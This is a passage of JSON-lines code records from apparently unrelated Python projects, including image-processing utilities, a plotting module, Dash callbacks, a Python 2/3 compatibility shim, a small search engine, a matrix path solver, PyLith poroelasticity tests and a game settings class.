sentiment_corpus_total[word] = sentiment_dict[word]\n print('word:({0}) found similar_word:({1}) with existing sentiment info'.format(word, similar_word[0]))\n flag = 1\n break\n else:\n flag=0\n continue\n #print(ty)\n except Exception as result:\n print(result)\n return sentiment_corpus_total,corpus,shanchu_word\n sentiment_corpus_total,corpus,shanchu_word= getcorpussentiment(fcorpus)\n return sentiment_corpus_total,corpus,shanchu_word\nsentiment_corpus_total,corpus,shanchu_word=get_corpus_sentiment(all_text_neg,all_text_pos)\n\n\n\n\n# count distinct tokens before deletion,\nword_list=[]\nfor doc in corpus_total:\n for word in doc:\n if word not in word_list:\n word_list.append(word)\nword_list1=[]\nfor i,corpus0 in corpus.items():\n for doc in corpus0:\n for word in doc:\n if word not in word_list1:\n word_list1.append(word)\n\n\n# export the deleted words\n##shanchu_word_list=shanchu_word['正面']+shanchu_word['反面']\n##f=open('C:/Users/Administrator/Desktop/data/corpus/shanchu_word_list.txt','w',encoding='utf-8')\n##f.write(shanchu_word_list)\n##f.close()\nprint('count before deletion: {0}'.format(len(word_list)))\nprint('count after deletion: {0}'.format(len(word_list1)))\n\nf=open('C:/Users/Administrator/Desktop/data/corpus/sentiment_corpus_train_3.txt','w',encoding='utf-8')\nf.write(str(sentiment_corpus_total))\nf.close()\n\nf=open('C:/Users/Administrator/Desktop/data/corpus/handle_corpus_train_3.txt','w',encoding='utf-8')\nf.write(str(corpus))\nf.close()\n\n\n","sub_path":"论文/get_sentiment_dict.py","file_name":"get_sentiment_dict.py","file_ext":"py","file_size_in_byte":11106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"243192902","text":"\nimport cv2\nimport numpy\n\nfrom menpo.shape.pointcloud import bounding_box\n\n'''\nDisplay menpo image with optional keypoints\n\n\\param[in] i_img 3 or 1 channel image\n\\param[in] i_pts Column of 2D keypoints\n'''\ndef DisplayMenpoImage(i_img, i_wait = 0, i_pts = None):\n\n # convert the menpo image to greyscale before display\n i_img = GreyscaleConversionMenpo(i_img)\n\n img = i_img.pixels[0].copy()\n\n # If no keypoints provided, only display image\n if i_pts is not None: \n for pt in i_pts:\n pt = pt.astype(int)\n cv2.circle(img, (pt[1], pt[0]), 2, 255, 0) \n\n cv2.namedWindow('image')\n cv2.imshow('image',img)\n cv2.waitKey(i_wait)\n\n'''\nDisplay openCV image with optional keypoints\n\n\\param[in] i_img 3 or 1 channel image\n\\param[in] i_pts Column of 2D keypoints\n'''\ndef DisplayOpenCVImage(i_img, i_wait = 0, i_pts = None):\n\n # If no keypoints provided, only display image\n if i_pts is not None: \n for pt in i_pts:\n pt = pt.astype(int)\n cv2.circle(i_img, (pt[1], pt[0]), 2, (255, 255, 255), 0) \n\n cv2.namedWindow('image')\n cv2.imshow('image',i_img)\n cv2.waitKey(i_wait)\n\n'''\nDisplay image with roi overlay\n\n\\param[in] i_img Input image\n\\param[in] i_rois Array of rect rois [ [roi1] [roi2] ... 
[roiN] ]\n'''\ndef DisplayRects(i_img, i_rois, i_wait = 0):\n\n img = i_img.copy()\n\n for roi in i_rois:\n\n top_left = (roi[0], roi[1])\n bottom_right = (roi[0] + roi[2], roi[1] + roi[3])\n cv2.rectangle(img, top_left, bottom_right, (255, 0,0), 4)\n\n cv2.namedWindow(\"ROIs\")\n cv2.imshow(\"ROIs\", img)\n cv2.waitKey(i_wait)\n\n\n'''\nConvert openCV Rect to Menpo bounding box\n\n\\param[in] i_rois Array of rects\n\n\\return Array of menpo bounding boxes with same ordering as input array\n'''\ndef ConvertRectToMenpoBoundingBox(i_rois):\n\n bbs = []\n for roi in i_rois:\n top_left = (roi[0], roi[1])\n bottom_right = (roi[0] + roi[2], roi[1] + roi[3])\n bbs.append( bounding_box( top_left, bottom_right ) )\n\n return bbs\n\n'''\nReturn largest ROI in list of rois\n\n\\param[in] i_rois list of rois\n\\return largest roi in list\n'''\ndef GetLargestROI(i_rois):\n\n area = i_rois[:,2] * i_rois[:,3]\n return i_rois[area.argmax(axis=0)]\n\n'''\nGreyscale conversion for menpo image\n\n\\param[in] i_img Menpo image\n\\return Greyscale image\n'''\ndef GreyscaleConversionMenpo(i_img):\n\n if i_img.n_channels == 3:\n i_img = i_img.as_greyscale(mode='luminosity')\n\n return i_img\n\n'''\nGreyscale conversion for openCV mat\n\n\\param[in] i_img OpenCV image\n\\return Greyscale image\n'''\ndef GreyscaleConversionOpenCV(i_img):\n\n if len(i_img.shape) == 3:\n i_img = cv2.cvtColor(i_img, cv2.COLOR_BGR2GRAY)\n\n return i_img\n\n","sub_path":"Python/UtilsImgProc.py","file_name":"UtilsImgProc.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"442623275","text":"from __future__ import (absolute_import, division, print_function)\nimport mslice.plotting.pyplot as plt\nfrom mslice.models.workspacemanager.workspace_algorithms import get_comment\nfrom mslice.models.labels import get_display_name, CUT_INTENSITY_LABEL\nfrom mslice.plotting.globalfiguremanager import GlobalFigureManager\n\nPICKER_TOL_PTS = 3\n\n\ndef draw_interactive_cut(workspace):\n cur_fig = plt.gcf()\n cur_canvas = cur_fig.canvas\n ax = plt.gca()\n\n # disconnect picking in interactive cut\n cur_canvas.manager.picking_connected(False)\n cur_canvas.manager.button_pressed_connected(False)\n\n if not cur_canvas.manager.has_plot_handler():\n cur_canvas.restore_region(cur_canvas.manager.get_cut_background())\n _create_cut(workspace)\n try:\n children = cur_fig.get_children()\n for artist in children:\n ax.draw_artist(artist)\n cur_canvas.blit(ax.clipbox)\n except AttributeError:\n cur_canvas.draw_idle()\n plt.show()\n\n\n@plt.set_category(plt.CATEGORY_CUT)\ndef plot_cut_impl(workspace, presenter, x_units, intensity_range=None, plot_over=False, legend=None):\n legend = workspace.name if legend is None else legend\n if not plot_over:\n plt.cla()\n\n cur_fig = plt.gcf()\n cur_canvas = cur_fig.canvas\n ax = cur_fig.add_subplot(1, 1, 1, projection='mantid')\n\n ax.errorbar(workspace.raw_ws, 'o-', label=legend, picker=PICKER_TOL_PTS)\n ax.set_ylim(*intensity_range) if intensity_range is not None else ax.autoscale()\n if cur_canvas.manager.window.action_toggle_legends.isChecked():\n leg = ax.legend(fontsize='medium')\n leg.draggable()\n ax.set_xlabel(get_display_name(x_units, get_comment(workspace)), picker=PICKER_TOL_PTS)\n ax.set_ylabel(CUT_INTENSITY_LABEL, picker=PICKER_TOL_PTS)\n if not plot_over:\n cur_canvas.set_window_title(workspace.name)\n cur_canvas.manager.update_grid()\n if not 
cur_canvas.manager.has_plot_handler():\n cur_canvas.manager.add_cut_plot(presenter, workspace.name.rsplit('_', 1)[0])\n cur_fig.canvas.draw()\n return ax.lines\n\n\ndef _create_cut(workspace):\n # workspace is passed by draw_interactive_cut; only the current figure state is needed here\n canvas = plt.gcf().canvas\n # don't include axis ticks in the saved background\n canvas.figure.gca().xaxis.set_visible(False)\n canvas.figure.gca().yaxis.set_visible(False)\n canvas.draw()\n canvas.manager.set_cut_background(canvas.copy_from_bbox(plt.gcf().canvas.figure.bbox))\n\n canvas.figure.gca().xaxis.set_visible(True)\n canvas.figure.gca().yaxis.set_visible(True)\n canvas.draw()\n\n\ndef cut_figure_exists():\n return GlobalFigureManager.active_cut_figure_exists()\n","sub_path":"mslice/views/cut_plotter.py","file_name":"cut_plotter.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"276239492","text":"import feffery_antd_components as fac\nfrom dash.dependencies import Input, Output, State\n\nfrom server import app\n\n\n@app.callback(\n Output('input-value-demo-output', 'children'),\n Input('input-value-demo', 'value'),\n prevent_initial_call=True\n)\ndef input_value_callback_demo(value):\n import time\n time.sleep(1)\n\n return fac.AntdText(f'value: {value}', italic=True)\n\n\n@app.callback(\n Output('input-nSubmit-demo-output', 'children'),\n Input('input-nSubmit-demo', 'nSubmit'),\n State('input-nSubmit-demo', 'value'),\n prevent_initial_call=True\n)\ndef input_nSubmit_callback_demo(nSubmit, value):\n import time\n time.sleep(1)\n\n if nSubmit and value:\n return fac.AntdText(f'nSubmit: {nSubmit} value: {value}', italic=True)\n\n\n@app.callback(\n Output('input-nClicksSearch-demo-output', 'children'),\n Input('input-nClicksSearch-demo', 'nClicksSearch'),\n State('input-nClicksSearch-demo', 'value'),\n prevent_initial_call=True\n)\ndef input_nClicksSearch_callback_demo(nClicksSearch, value):\n import time\n time.sleep(1)\n\n if nClicksSearch and value:\n return fac.AntdText(f'nClicksSearch: {nClicksSearch} value: {value}', italic=True)\n","sub_path":"callbacks/AntdInput.py","file_name":"AntdInput.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"625460383","text":"# -*- coding: utf-8 -*-\n\n\"\"\"For documentation and usage, please see the file README.rst.\n\nThis module is donated to the public domain.\n\"\"\"\n\nimport sys\n\n# Test for Python 2, not 3; don't get bitten when Python 4 appears:\nIS_PYTHON2 = (sys.version_info[0] == 2)\nIS_PYPY = hasattr(sys, 'pypy_translation_info')\nfrom importlib import import_module\n\nif IS_PYTHON2: # Rename Python 2 builtins so they become like Python 3\n native_str = bytes\n str = unicode\n basestring = basestring\n byte_chr = chr # does not seem to have an equivalent in Python 3.\n chr = unichr # takes an int and returns the corresponding unicode char\n integer_types = (int, long)\n long = long\n from types import ClassType\n class_types = (type, ClassType)\n del ClassType\n range_list = range\n range = xrange\n iterkeys = lambda d: d.iterkeys()\n itervalues = lambda d: d.itervalues()\n iteritems = lambda d: d.iteritems()\n from itertools import ifilter as filter, imap as map, izip as zip\n # In Python 2, *input* was equivalent to eval(raw_input(prompt)):\n input = raw_input\nelse: # For Python 3, declare these variables so they can be chain imported:\n basestring = native_str = str = str\n chr = chr # No need to do the same to ord()\n integer_types = (int,)\n long 
= int\n class_types = type\n range = range\n range_list = lambda *a: list(range(*a))\n iterkeys = lambda d: iter(d.keys())\n itervalues = lambda d: iter(d.values())\n iteritems = lambda d: iter(d.items())\n filter = filter\n map = map\n zip = zip\n input = input\n\nif IS_PYTHON2:\n # Turn code into string to avoid SyntaxError on Python 3:\n exec('def reraise(tp, value, tb=None):\\n raise tp, value, tb')\nelse:\n def reraise(tp, value, tb=None):\n if value.__traceback__ is not tb:\n raise value.with_traceback(tb)\n raise value\n\n# ===== Class decorators =====\nif IS_PYTHON2:\n def implements_to_string(cls):\n \"\"\"Class decorator that converts __str__() and __bytes__.\n\n You define __str__() and it is moved to __unicode__() on Python 2.\n\n Additionally, if you define __bytes__(), it becomes __str__() on\n Python 2. If __bytes__() is not defined, __str__() executes\n __unicode__() and encodes the result to utf-8.\n \"\"\"\n cls.__unicode__ = cls.__str__\n cls.__str__ = cls.__bytes__ if hasattr(cls, '__bytes__') \\\n else lambda x: x.__unicode__().encode('utf-8')\n return cls\n\n def implements_iterator(cls):\n \"\"\"Class decorator. next() has been renamed to __next__().\"\"\"\n cls.next = cls.__next__\n del cls.__next__\n return cls\n\n def implements_repr(cls):\n \"\"\"Class decorator that wraps __repr__() in Python 2.\n\n You implement __repr__() returning a unicode string,\n and in Python 2, I encode it to utf-8 for you.\n \"\"\"\n cls.__repr_unicode__ = cls.__repr__\n\n def wrapper(self):\n return self.__repr_unicode__().encode('utf-8')\n cls.__repr__ = wrapper\n return cls\n\n def nine(cls):\n \"\"\"Class decorator for Python 2 and 3 compatibility of magic methods.\n\n You define the magic methods with their Python 3 names and,\n on Python 2, they get their corresponding names. You may write:\n\n * __next__(). Use the next(iterator) function to iterate.\n * __str__(): must return a unicode string.\n * __repr__(): must return a unicode string.\n * __bytes__(): must return a bytes object.\n\n (*nine* is all the above class decorators in one.)\n \"\"\"\n if hasattr(cls, '__str__'):\n cls = implements_to_string(cls)\n if hasattr(cls, '__next__'):\n cls = implements_iterator(cls)\n if hasattr(cls, '__repr__'):\n cls = implements_repr(cls)\n return cls\nelse: # On Python 3, these class decorators do nothing:\n implements_to_string = implements_iterator = implements_repr = nine = \\\n lambda cls: cls\n\n\n# http://docs.pythonsprints.com/python3_porting/py-porting.html\n_moved = { # Mapping from Python 3 to Python 2 location. 
May need improvement.\n 'builtins': '__builtin__',\n 'configparser': 'ConfigParser',\n 'copyreg': 'copy_reg',\n '_markupbase': 'markupbase',\n 'pickle': 'cPickle',\n 'queue': 'Queue',\n 'reprlib': 'repr',\n 'socketserver': 'SocketServer',\n '_thread': 'thread',\n 'tkinter': 'Tkinter',\n 'http.client': 'httplib',\n 'http.cookiejar': 'cookielib',\n 'http.cookies': 'Cookie',\n 'html.entities': 'htmlentitydefs',\n 'html.entities:entitydefs': 'htmlentitydefs:entitydefs',\n 'html.entities:name2codepoint': 'htmlentitydefs:name2codepoint',\n 'html.entities:codepoint2name': 'htmlentitydefs:codepoint2name',\n 'html:escape': 'cgi:escape',\n 'html.parser:HTMLParser': 'htmllib:HTMLParser',\n 'urllib.robotparser': 'robotparser',\n 'urllib.error:ContentTooShortError': 'urllib:ContentTooShortError',\n 'urllib.parse': 'urlparse',\n 'urllib.parse:quote': 'urllib:quote',\n 'urllib.parse:quote_plus': 'urllib:quote_plus',\n 'urllib.parse:unquote': 'urllib:unquote',\n 'urllib.parse:unquote_plus': 'urllib:unquote_plus',\n 'urllib.parse:urlencode': 'urllib:urlencode',\n 'urllib.request:getproxies': 'urllib:getproxies',\n 'urllib.request:pathname2url': 'urllib:pathname2url',\n 'urllib.request:url2pathname': 'urllib:url2pathname',\n 'urllib.request:urlcleanup': 'urllib:urlcleanup',\n 'urllib.request:urlretrieve': 'urllib:urlretrieve',\n 'urllib.request:URLopener': 'urllib:URLopener',\n 'urllib.request:FancyURLopener': 'urllib:FancyURLopener',\n 'urllib.request:urlopen': 'urllib2:urlopen',\n 'urllib.request:install_opener': 'urllib2:install_opener',\n 'urllib.request:build_opener': 'urllib2:build_opener',\n 'urllib.error:URLError': 'urllib2:URLError',\n 'urllib.error:HTTPError': 'urllib2:HTTPError',\n 'urllib.request:Request': 'urllib2:Request',\n 'urllib.request:OpenerDirector': 'urllib2:OpenerDirector',\n 'urllib.request:BaseHandler': 'urllib2:BaseHandler',\n 'urllib.request:HTTPDefaultErrorHandler':\n 'urllib2:HTTPDefaultErrorHandler',\n 'urllib.request:HTTPRedirectHandler': 'urllib2:HTTPRedirectHandler',\n 'urllib.request:HTTPCookieProcessor': 'urllib2:HTTPCookieProcessor',\n 'urllib.request:ProxyHandler': 'urllib2:ProxyHandler',\n 'urllib.request:HTTPPasswordMgr': 'urllib2:HTTPPasswordMgr',\n 'urllib.request:HTTPPasswordMgrWithDefaultRealm':\n 'urllib2:HTTPPasswordMgrWithDefaultRealm',\n 'urllib.request:AbstractBasicAuthHandler':\n 'urllib2:AbstractBasicAuthHandler',\n 'urllib.request:HTTPBasicAuthHandler': 'urllib2:HTTPBasicAuthHandler',\n 'urllib.request:ProxyBasicAuthHandler': 'urllib2:ProxyBasicAuthHandler',\n 'urllib.request:AbstractDigestAuthHandler':\n 'urllib2:AbstractDigestAuthHandler',\n 'urllib.request:HTTPDigestAuthHandler': 'urllib2:HTTPDigestAuthHandler',\n 'urllib.request:ProxyDigestAuthHandler': 'urllib2:ProxyDigestAuthHandler',\n 'urllib.request:HTTPHandler': 'urllib2:HTTPHandler',\n 'urllib.request:HTTPSHandler': 'urllib2:HTTPSHandler',\n 'urllib.request:FileHandler': 'urllib2:FileHandler',\n 'urllib.request:FTPHandler': 'urllib2:FTPHandler',\n 'urllib.request:CacheFTPHandler': 'urllib2:CacheFTPHandler',\n 'urllib.request:UnknownHandler': 'urllib2:UnknownHandler',\n}\nif sys.version_info < (3, 9):\n # dummy_thread has been removed from Python 3.9\n # https://bugs.python.org/issue37312\n _moved['_dummy_thread'] = 'dummy_thread'\n\n\ndef nimport(spec):\n \"\"\"Given a Python 3 resource spec, imports and returns it.\n\n Example usage::\n\n join = nimport('os.path:join')\n\n The \":\" indicates \"join\" is a variable in the module \"os.path\".\n\n The spec should provide the **new** location of 
the module or variable.\n *nine* is supposed to know the corresponding, old Python 2 location.\n Bug reports and pull requests are welcome.\n \"\"\"\n assert spec\n if IS_PYTHON2: # Get the Python 2 location of the name, first.\n spec = _moved.get(spec, spec)\n alist = spec.split(':')\n if len(alist) > 2:\n raise ValueError(\n 'The argument *spec* cannot have more than '\n '2 colon-separated parts: \"{}\"'.format(spec))\n elif len(alist) == 2:\n module, name = alist\n elif len(alist) == 1:\n module = alist[0]\n name = None\n module = import_module(module)\n return getattr(module, name) if name else module\n\n# don't export nine.six\ndel sys\n","sub_path":"Python_Web_Django/Version_actual/Web_Django/Lab2/venv/Lib/site-packages/nine/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"630490550","text":"import pickle\nfrom collections import defaultdict\nfrom nltk.tokenize import RegexpTokenizer\nfrom nltk.stem.snowball import EnglishStemmer\nimport math\nimport json\n\n\n\nclass searchEngine:\n\n\tdef __init__(self, query,database):\n\t\tself.database = database\n\t\tself.datalist = []\n\t\tself.corpusCount = 37497\n\t\tself.query = query\n\n\n\tdef token_query(self):\n\t\tself.datalist = []\n\t\tquery_dict = {}\n\t\ttokenizer = RegexpTokenizer(r'\\w+')\n\t\tstemmer = EnglishStemmer()\n\t\tquery_t = tokenizer.tokenize(self.query.lower())\n\n\t\tfor word in query_t:\n\t\t\tself.datalist.append(word)\n\t\t\tif word not in query_dict.keys():\n\t\t\t\tquery_dict[word] = 1\n\t\t\telse:\n\t\t\t\tquery_dict[word] += 1\n\t\tprint(query_dict)\n\t\treturn self.nlizeQuery(query_dict)\n\n\tdef nlizeQuery(self, wordsdict):\n\t\tnormalfactor = 0\n\t\tfor word in wordsdict.keys():\n\t\t\twordsdict[word] = 1 + math.log10(wordsdict[word])\n\t\t\tif word in self.database.keys():\n\t\t\t\tdf = len(self.database[word])\n\t\t\t\tidf = math.log10(self.corpusCount/df)\n\t\t\telse:\n\t\t\t\tidf = 0\t\n\t\t\t# wt\n\t\t\twordsdict[word] *= idf * wordsdict[word] \n\t\t\tnormalfactor += wordsdict[word]**2\n\t\tnormalfactor = math.sqrt(normalfactor)\n\t\tfor word in wordsdict.keys():\n\t\t\tif word in self.database.keys():\n\t\t\t\twordsdict[word] = wordsdict[word]/normalfactor\n\t\t\telse:\n\t\t\t\twordsdict[word] = 0\n\t\t# print(wordsdict)\n\t\treturn wordsdict\n\n\tdef cosineSim(self):\n\t\tcosim = {}\n\t\tquery_dict = self.token_query() \n\t\tfor word in query_dict.keys():\n\t\t\tif word in self.database.keys():\n\t\t\t\tfor docId in self.database[word].keys():\n\t\t\t\t\tif docId in cosim.keys():\n\t\t\t\t\t\tsingle_score = self.database[word][docId][0] * query_dict[word]\n\t\t\t\t\t\tcosim[docId] += single_score\n\t\t\t\t\telse:\n\t\t\t\t\t\tcosim[docId] = self.database[word][docId][0] * query_dict[word]\n\t\treturn cosim\n\n\tdef cstPhrase(self):\n\t\tcosim = self.cosineSim()\n\t\twordlist = self.datalist\n\t\tif len(self.datalist) > 1:\n\t\t\tfor i in range(len(wordlist)-1):\n\t\t\t\tif wordlist[i] in self.database.keys() and wordlist[i+1] in self.database.keys():\n\t\t\t\t\tfor docId in cosim.keys():\n\t\t\t\t\t\tif docId in self.database[wordlist[i]].keys():\n\t\t\t\t\t\t\tif docId in self.database[wordlist[i+1]].keys():\n\t\t\t\t\t\t\t\tfor j in range(len(self.database[wordlist[i]][docId])-1):\n\t\t\t\t\t\t\t\t\tfor k in range(len(self.database[wordlist[i+1]][docId])-1):\n\t\t\t\t\t\t\t\t\t\tif self.database[wordlist[i+1]][docId][k+1] - self.database[wordlist[i]][docId][j+1] == 
1:\n\t\t\t\t\t\t\t\t\t\t\tcosim[docId] *= 1.2\n\t\treturn cosim\n\tdef rankDoc(self):\n\t\tscore = self.cstPhrase()\n\t\treturn sorted(score.items(), key=lambda x: (-x[1], x[0]), reverse=False)\n\n\tdef printResult(self):\n\t\ti= 0\n\t\ttklist = []\n\t\tresult = self.rankDoc()\n\t\t# print(result)\n\t\tif len(result) == 0:\n\t\t\tprint(\"no result\")\n\t\telse:\t\n\t\t\twith open(\"bookkeeping.json\") as data_file:\n\t\t\t\ttry:\n\t\t\t\t\tdata = json.load(data_file)\n\t\t\t\texcept ValueError:\n\t\t\t\t\tdata ={}\n\t\t\tfor docId in result:\n\t\t\t\ti += 1\n\t\t\t\ttklist.append(data[docId[0]])\n\t\t\t\tif i == 10:\n\t\t\t\t\tbreak\n\t\t\tprint(i)\n\t\treturn tklist","sub_path":"2.Tkinter+nostemmer/searchtk.py","file_name":"searchtk.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"308590647","text":"#!/usr/bin/env python3\n\"\"\"Longest increasing path in a matrix. Solution to challenge from\nhttps://leetcode.com/problems/longest-increasing-path-in-a-matrix\n\nAlvaro Leal , 2018\n\"\"\"\n\n\nclass SimpleStack(object):\n def __init__(self):\n self.data = []\n\n def push(self, value):\n self.data.append(value)\n\n def pop(self):\n if len(self.data) > 0:\n return self.data.pop()\n\n def is_empty(self):\n return len(self.data) == 0\n\n\ndef get_longest_increasing_path_length(matrix):\n if len(matrix) == 0:\n return 0\n\n if len(matrix[0]) == 1:\n return 1\n\n max_path_length = 0\n paths = SimpleStack()\n for row in range(len(matrix)):\n for col in range(len(matrix[0])):\n paths.push([[row, col]])\n\n while not paths.is_empty():\n path = paths.pop()\n curr_node = path[-1]\n next_nodes = []\n if curr_node[0] > 0:\n next_nodes.append([curr_node[0] - 1, curr_node[1]]) # Row up\n\n if curr_node[0] < len(matrix) - 1:\n next_nodes.append([curr_node[0] + 1, curr_node[1]]) # Row up\n \n if curr_node[1] > 0:\n next_nodes.append([curr_node[0], curr_node[1] - 1]) # Col left\n\n if curr_node[1] < len(matrix[0]) - 1:\n next_nodes.append([curr_node[0], curr_node[1] + 1]) # Col right\n\n for next_node in next_nodes:\n if next_node not in path:\n if matrix[next_node[0]][next_node[1]] > matrix[curr_node[0]][curr_node[1]]:\n new_path = list(path)\n new_path.append(next_node)\n paths.push(new_path)\n else:\n if max_path_length is None or len(path) > max_path_length:\n max_path_length = len(path)\n else:\n if max_path_length is None or len(path) > max_path_length:\n max_path_length = len(path)\n return max_path_length\n\n\ndef main():\n # matrix = [\n # [1,9,4],\n # [2,6,8],\n # [2,1,1]] \n\n # print(get_longest_increasing_path_length(matrix))\n\n\n matrix = [[1, 2]]\n print(get_longest_increasing_path_length(matrix))\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"longest_increasing_path_in_a_matrix/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"38986339","text":"#!/usr/bin/env nemesis\n#\n# ----------------------------------------------------------------------\n#\n# Brad T. Aagaard, U.S. Geological Survey\n# Charles A. Williams, GNS Science\n# Matthew G. 
Knepley, University of Chicago\n#\n# This code was developed as part of the Computational Infrastructure\n# for Geodynamics (http://geodynamics.org).\n#\n# Copyright (c) 2010-2017 University of California, Davis\n#\n# See COPYING for license information.\n#\n# ----------------------------------------------------------------------\n#\n# @file tests/fullscale/poroelasticity/cryer/TestCryer.py\n#\n# @brief Test suite for testing pylith with Cryer's problem.\n\nimport unittest\n\nfrom pylith.testing.FullTestApp import check_data\nfrom pylith.testing.FullTestApp import TestCase as FullTestCase\n\nimport meshes\nfrom cryer_soln import AnalyticalSoln\n\n# We do not include trace_strain in the solution fields, because of the\n# poor convergence of the series solution.\nSOLUTION_FIELDS = [\"displacement\", \"pressure\"]\n\nratio_tolerance = {'displacement': 1.0, 'pressure': 1.0}\ndiff_tolerance = {'displacement': 0.5, 'pressure': 0.5}\n# ----------------------------------------------------------------------------------------------------------------------\n\n\nclass TestCase(FullTestCase):\n \"\"\"\n Test suite for testing PyLith with three dimensional poroelasticity\n by means of Cryer's problem.\n \"\"\"\n DIRICHLET_BOUNDARIES = [\"x_neg\", \"y_neg\", \"z_neg\", \"surface_pressure\"]\n NEUMANN_BOUNDARIES = [\"surface_traction\"]\n def setUp(self):\n \"\"\"\n Setup for test.\n \"\"\"\n FullTestCase.setUp(self)\n self.exactsoln = AnalyticalSoln()\n return\n\n def run_pylith(self, testName, args):\n FullTestCase.run_pylith(self, testName, args)\n return\n\n def test_domain_solution(self):\n filename = \"output/{}-domain.h5\".format(self.NAME)\n vertexFields = [\"displacement\", \"pressure\"]\n check_data(filename, self, self.DOMAIN, vertexFields=vertexFields,\n ratio_tolerance=ratio_tolerance, diff_tolerance=diff_tolerance)\n return\n\n def test_material_info(self):\n cellFields = ['biot_coefficient', 'biot_modulus', 'drained_bulk_modulus',\n 'fluid_density', 'fluid_viscosity', 'isotropic_permeability',\n 'porosity', 'shear_modulus', 'solid_density']\n for material in self.MATERIALS:\n filename = \"output/{}-{}_info.h5\".format(self.NAME, material)\n check_data(filename, self, self.MATERIALS[material], cellFields=cellFields,\n ratio_tolerance=ratio_tolerance, diff_tolerance=diff_tolerance)\n return\n\n def test_material_solution(self):\n vertexFields = [\"displacement\", \"pressure\"]\n for material in self.MATERIALS:\n filename = \"output/{}-{}.h5\".format(self.NAME, material)\n check_data(filename, self, self.MATERIALS[material], vertexFields=vertexFields,\n ratio_tolerance=ratio_tolerance, diff_tolerance=diff_tolerance)\n return\n\n def test_bcdirichlet_info(self):\n vertexFields = [\"initial_amplitude\"]\n for bc in self.DIRICHLET_BOUNDARIES:\n self.exactsoln.key = bc\n filename = \"output/{}-{}_info.h5\".format(self.NAME, bc)\n check_data(filename, self, self.BOUNDARIES[bc], vertexFields=vertexFields,\n ratio_tolerance=ratio_tolerance, diff_tolerance=diff_tolerance)\n return\n\n def test_bcdirichlet_solution(self):\n vertexFields = [\"displacement\", \"pressure\"]\n for bc in self.DIRICHLET_BOUNDARIES:\n filename = \"output/{}-{}.h5\".format(self.NAME, bc)\n check_data(filename, self, self.BOUNDARIES[bc], vertexFields=vertexFields,\n ratio_tolerance=ratio_tolerance, diff_tolerance=diff_tolerance)\n return\n\n# ----------------------------------------------------------------------------------------------------------------------\n\n\nclass TestHex(TestCase, meshes.Hex):\n NAME = \"cryer_hex\"\n\n 
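The longest-increasing-path record above enumerates every increasing path explicitly through a stack, which can blow up combinatorially on larger inputs. A memoized DFS (our own alternative sketch, not the record's approach) answers the same question in O(rows * cols) time, since each cell's best path length is computed once:

from functools import lru_cache

def longest_increasing_path(matrix):
    if not matrix or not matrix[0]:
        return 0
    rows, cols = len(matrix), len(matrix[0])

    @lru_cache(maxsize=None)
    def dfs(r, c):
        # length of the longest increasing path starting at (r, c)
        best = 1
        for dr, dc in ((-1, 0), (1, 0), (0, -1), (0, 1)):
            nr, nc = r + dr, c + dc
            if 0 <= nr < rows and 0 <= nc < cols and matrix[nr][nc] > matrix[r][c]:
                best = max(best, 1 + dfs(nr, nc))
        return best

    return max(dfs(r, c) for r in range(rows) for c in range(cols))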
def setUp(self):\n TestCase.setUp(self)\n TestCase.run_pylith(self, self.NAME, [\"cryer.cfg\", \"cryer_hex.cfg\"])\n return\n\n\n# ----------------------------------------------------------------------------------------------------------------------\nclass TestTet(TestCase, meshes.Tet):\n NAME = \"cryer_tet\"\n\n def setUp(self):\n TestCase.setUp(self)\n TestCase.run_pylith(self, self.NAME, [\"cryer.cfg\", \"cryer_tet.cfg\"])\n return\n\n\n# ----------------------------------------------------------------------------------------------------------------------\ndef test_cases():\n return [\n TestHex,\n TestTet,\n ]\n\n# ----------------------------------------------------------------------------------------------------------------------\nif __name__ == '__main__':\n FullTestCase.parse_args()\n\n suite = unittest.TestSuite()\n for test in test_cases():\n suite.addTest(unittest.makeSuite(test))\n unittest.TextTestRunner(verbosity=2).run(suite)\n\n\n# End of file\n","sub_path":"tests/fullscale/poroelasticity/cryer/TestCryer.py","file_name":"TestCryer.py","file_ext":"py","file_size_in_byte":5074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"334520907","text":"class Settings:\n \"\"\"\n A class to represent the game settings\n ...\n Methods\n -------\n increase_speed() - used to increase difficulty but also points awarded when\n hitting a kitty when leveling up\n \"\"\"\n\n def __init__(self):\n self.screen_width = 1000\n self.screen_height = 700\n self.button_width = 200\n self.button_height = 50\n self.button_top_margin = 600\n self.button_left_margin = 400\n self.logo_top_margin = 100\n self.small_margin = 10\n self.medium_margin = 20\n\n self.buffer_zone = 400\n self.kitty_buffer_factor = 2\n\n self.font_size = 48\n self.score_font_size = 36\n\n self.play_button_text = \"Play\"\n self.caption = \"Felicide\"\n\n self.bg_color = (254, 127, 156)\n self.button_color = (108, 70, 117)\n self.text_color = (255, 193, 37)\n self.score_text_color = (46, 139, 87)\n\n self.bork_image = 'images/bork.png'\n self.corgi_image = 'images/corgibutt.png'\n self.kitty_image = 'images/kitty.png'\n self.logo_image = 'images/logo1.png'\n\n self.sound_volume = 0.2\n self.bork_sound = 'sounds/bork.wav'\n\n self.corgi_limit = 3\n\n self.army_drop_speed = 10\n self.time_interval = 0.25\n self.break_time = 2500\n\n self.speedup_scale = 1.1\n self.score_scale = 1.5\n\n self.corgi_speed = 1.5\n self.bork_speed = 8\n self.kitty_speed_factor = 0.75\n self.army_direction = 1 # 1 represents right, -1 left\n self.kitty_points = 100\n\n def increase_speed(self):\n self.corgi_speed *= self.speedup_scale\n self.bork_speed *= self.speedup_scale\n self.kitty_speed_factor *= self.speedup_scale\n self.kitty_points = int(self.kitty_points * 